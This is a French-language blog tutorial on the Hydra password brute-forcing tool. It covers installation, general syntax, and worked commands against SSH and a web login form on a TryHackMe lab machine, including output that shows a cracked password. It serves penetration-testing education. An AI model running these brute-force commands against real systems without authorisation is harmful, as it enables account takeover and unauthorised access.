Kali-linux distribution GNU/Linux spécialisée dans l'audit et le pentest.
Kali-linux.fr Communauté française de kali-linux
tutoriel hydra en francais pour le bruteforce

Aujourd’hui, nous allons à la découverte d’un “nouvel” outil, hydra. Hydra a toute sa place dans votre arsenal de hacking car c’est un puissant outil de bruteforce de mot de passes qui supporte une liste impressionnante de protocoles.

Si vous avez envie par exemple de tester la solidité du mot de passe utilisé pour la connexion à un système distant, hydra peut donc s’avérer un excellent outil pour vous permettre cela.

Nous allons apprendre dans ce tutoriel sur Hydra comment l’installer, et comment l’utiliser dans différents cas d’usage.

Hydra, c’est quoi ?

Hydra est un cracker de connexion parallélisé qui prend en charge de nombreux protocoles d’attaque. Il est très rapide et flexible, et peut être étendu grâce à des modules supplémentaires.

La liste des protocoles supportée est impressionnante, je cite: Astérisque, AFP, Cisco AAA, authentification Cisco, activation Cisco, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM -GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, proxy HTTP, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, auditeur Oracle, Oracle SID, Oracle , PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP / R3, SIP, SMB, SMTP, Enum SMTP, SNMP v1 + v2 + v3, SOCKS5, SSH (v1 et v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC et XMPP.

Les différents tests que nous allons faire au cours de ce tuto, ont été réalisés dans le room hydra de tryhackme. Je vous invite donc à déployer cette machine afin d’appliquer ce qui suit et pratique ces commandes et en apprendre plus sur hydra.

Comment installer hydra si vous n’êtes pas sur kali ?

Si vous êtes sur Kali linux, vous trouverez Hydra inclus parmis les outils de la distribution.

Sinon pour l’installer il faut commencer par télécharger la dernière version du projet ici.
Ensuite décompresser le dossier, et à la racine du dossier il faut exécuter cette commande ./configure, puis la commande make,et enfin finir l’installation par la commande make install .

L’installation est maintenant terminée, et nous pouvons maintenant lancer hydra.

Comment fonctionne hydra ?

Pour que Hydra fonctionne avec un protocole, nous aurons besoin des paramètres comme :

  • un nom d’utilisateur (-l) ou une liste de noms d’utilisateur (-L),
  • un mot de passe (-p) ou d’une liste de mots de passe (-P)
  • une adresse IP cible associée au protocole.

La syntaxe générale est

hydra -l < nom d'utilisateur > -P < mot de passe > < protocole > : // < ip >

vous pouvez également le faire de la manière suivante :

hydra -l < nom d'utilisateur > -P < mot de passe fichier de > -s < port > -V < ip > < protocole >

avec l’option -s pour le port et l’option -V pour la verbosité.

Comment utiliser hydra pour faire du brute force sur le ssh?

Si nous connaissons le nom d’utilisateur, nous allons procéder de la manière suivante.

hydra -l molly -P rockyou.txt 10.10.219.212 ssh 

sinon

hydra -L user.txt -P rockyou.txt 10.10.219.212 ssh

Comment utiliser hydra sur un formulaire web?

Pour faire du bruteforce avec hydra sur une formulaire web,il faudra utiliser la syntaxe suivante
hydra -l -P http-post-form "{lien vers la page de connexion}:{les paramètres du formulaire}:F={message a rechercher sur la page si la connexion échoue}".

Dans notre cas l’adresse de la cible est http://10.10.219.212/login, le message d’erreut est “Your password is incorrect”, et enfin les paramètres de la requête que nous avons pu avoir grâce a l’option réseau du web develloper de firefox.

La commande finale donne:

hydra -l molly -P rockyou.txt 10.10.219.212 http-post-form "/login:username=^USER^&password=^PASS^:F=Your password is incorrect" -V. 

Résultat…

[80][http-post-form] host: 10.10.219.212   login: molly   password: sunshine
1 of 1 target successfully completed, 1 valid password found

On obtient donc notre mot de passe.

Conclusion

En dehors des protocoles que nous avons utilisé pour l’article et les différentes options cités, hydra peut être utilisé de diverses manières. Il dispose de plusieurs autres options pour optimiser son exécution et gagner en efficacité. Tout dépendra du contexte dans lequel vous allez l’utiliser…

Voila donc pour cette introduction.
À bientôt pour encore plus d’astuces.

Leave a Comment

Time limit is exhausted. Please reload CAPTCHA.